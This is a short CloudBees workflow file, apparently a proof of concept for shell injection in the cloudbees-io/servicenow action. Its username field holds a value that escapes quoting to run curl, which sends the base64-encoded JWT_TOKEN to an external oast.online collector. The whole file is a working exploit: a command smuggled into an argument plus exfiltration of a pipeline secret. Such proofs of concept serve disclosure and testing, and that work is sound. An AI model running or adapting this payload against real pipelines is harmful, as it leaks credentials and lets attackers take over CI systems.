apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: servicenow-shell-injection-poc
on:
  workflow_dispatch:
jobs:
  exploit:
    steps:
      - uses: cloudbees-io/servicenow@v1
        with:
          action-type: 'create_change'
          url: 'https://example.service-now.com'
          username: "x' & curl -s 'https://d92m7ikjor34qm6itqugomnxjizzyujbs.oast.online/?jwt='$(echo $JWT_TOKEN | base64 -w0 | tr -d '\n'); :'y"
          password: 'testpass'
          cr-number: '12345'
